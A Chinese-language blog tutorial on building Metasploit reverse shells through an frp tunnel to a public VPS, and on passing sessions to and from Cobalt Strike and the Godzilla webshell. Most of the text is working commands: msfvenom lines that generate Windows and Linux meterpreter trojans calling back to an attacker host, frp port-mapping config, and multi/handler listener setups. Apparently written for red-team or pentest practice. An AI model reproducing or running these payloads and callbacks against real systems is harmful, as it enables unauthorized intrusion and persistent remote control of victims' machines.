MSF反弹shell、与CS_哥斯拉联动
0x00-引言#
0x01-思路#
公网vps启动frp,本地kali启动frp客户端,frp客户端配置将kali端口映射到vps某个端口,msf生成木马接收shell
0x02-msf反弹shell#
01-frp配置#
frp客户端配置,将本地1234端口映射到vps1080
[common]
server_addr = 1.xx.xx.xx #这里是公网vps的ip
server_port = 6666 #这里的端口要跟服务端的一样
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 1234 # 转发给本地的1234端口
remote_port = 1080 #服务端的1080端口转发给本地的1234端口
02-上线windows主机#
msf生成windows木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=公网ip LPORT=1080 -f exe > /root/hacker.exe
msfconsole
use exploit/multi/handler #开启监听
set payload windows/meterpreter/reverse_tcp #设置payload,选择漏洞利用模块
set LHOST 127.0.0.1 #本地IP,即攻击IP
set LPORT 1234 #监听端口
exploit #攻击
tasklist | findstr hacker
taskkill -f /pid 进程号
03-上线linux主机#
msf生成linux木马
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=8888 -f elf > mshell.elf
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost xxx.xxx.xxx.xxx
set lport 8888
exploit #攻击
加权限运行木马-成功上线
查找hacker服务进程并kill
0x03-cs与msf联动#
msfconsole
use exploit/multi/handler #开启监听
set payload windows/meterpreter/reverse_http #设置payload,选择漏洞利用模块
set LHOST 127.0.0.1 #本地IP,即攻击IP
set LPORT 12345 #监听端口
exploit #攻击
CS中转发shell
新建会话
选择payload
MSF成功接收到shell
msf吊啊,cs的进程都给杀掉了,msf的shell还没挂
cs显示已挂
0x04-msf与哥斯拉联动#
打开shell,如图
添加vps地址与端口,端口为kali映射的端口
use exploit/multi/handler #启用监听模块
set payload php/meterpreter/reverse_tcp #选择payload
set lhost 0.0.0.0
set lport 4444
run
0x05-参考#
https://www.bilibili.com/read/cv13762388/
http://events.jianshu.io/p/02582b971eb1
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】博客园携手 AI 驱动开发工具商 Chat2DB 推出联合终身会员
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步